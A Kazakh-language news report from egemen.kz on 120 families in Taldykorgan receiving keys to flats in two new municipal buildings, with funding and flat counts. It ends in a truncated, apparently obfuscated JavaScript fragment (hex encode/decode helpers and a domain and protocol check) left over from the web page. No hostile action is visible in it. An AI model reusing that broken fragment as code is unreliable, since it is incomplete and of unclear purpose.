ТАЛДЫҚОРҒАН. 16 мамыр. Талдықорған қаласында 120 отбасы пәтерлі болды. Бұл туралы egemen.kz тілшісі хабарлады.
Алматы облысының әкімі Амандық Баталов кезекте тұрған азаматтарға, соның ішінде мүгедектер, жетім балалар, көпбалалы және толық емес отбасылар, ауғандық ардагерлер, бюджеттік сала қызметкерлеріне қаланың Оңтүстік-Батыс ауданындағы екі коммуналдық үйдің кілтін тапсырды. Қоныстой иелерін қуаныштарымен құттықтап, олардың отбасыларына амандық тіледі.
Жалпы, бұл 60 пәтерлі екі үйдің құрылысы 2014 жылы басталған болатын. «Өңірлерді дамыту – 2020» бағдарламасының шеңберінде тұрғын үй құрылысына 765 577,94 мың теңге бөлінген. 120 пәтердің 56-сы бір бөлмелі, 64-і – екі бөлмелі болды.
Нұрбол Әлдібаев.
Дерек, фото: egemen.kz
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "egemen.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e